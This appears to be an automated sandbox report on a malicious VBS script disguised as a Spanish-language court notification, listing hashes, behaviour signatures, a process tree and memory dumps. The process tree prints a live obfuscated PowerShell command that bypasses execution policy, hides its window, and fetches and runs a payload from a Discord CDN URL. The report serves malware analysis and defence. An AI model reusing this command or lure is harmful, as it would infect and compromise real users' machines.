Overview

overview

10

Static

static

SPOA Siste...bs.vbs

windows7_x64

8

SPOA Siste...bs.vbs

windows10_x64

10

Analysis

  • max time kernel
    157s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    01-10-2021 19:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SPOA Sistema Penal Oral Acusatorio Notificacion de requerimiento fiscal a su nombre por admision de denuncia.vbs.vbs

  • Size

    827B

  • MD5

    5b4cbb9b11c79830351c9e2bf59c5a42

  • SHA1

    98328f4e9da68649cb8c003b83f1123cfef91678

  • SHA256

    e25d5a23459ac8a9dd459db9ff70b0553f256b6b074c3848bffa65886d6d9f24

  • SHA512

    ced0b4a8a102be874860836fa674b07c0161352e3ac3066cd248f53c770948d54b098a6bc96128cddc92044028bc092edc0416dac72cdb96f67a75040e7df15f

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SPOA Sistema Penal Oral Acusatorio Notificacion de requerimiento fiscal a su nombre por admision de denuncia.vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/884806965497319514/Cryp16.txt');$results
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2032

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1232-53-0x000007FEFBA71000-0x000007FEFBA73000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2032-54-0x0000000000000000-mapping.dmp

    Download

  • memory/2032-59-0x00000000028A4000-0x00000000028A7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2032-58-0x00000000028A2000-0x00000000028A4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2032-57-0x00000000028A0000-0x00000000028A2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2032-56-0x000007FEF2490000-0x000007FEF2FED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/2032-60-0x000000001B700000-0x000000001B9FF000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/2032-61-0x00000000028AB000-0x00000000028CA000-memory.dmp

    Filesize

    124KB

    Download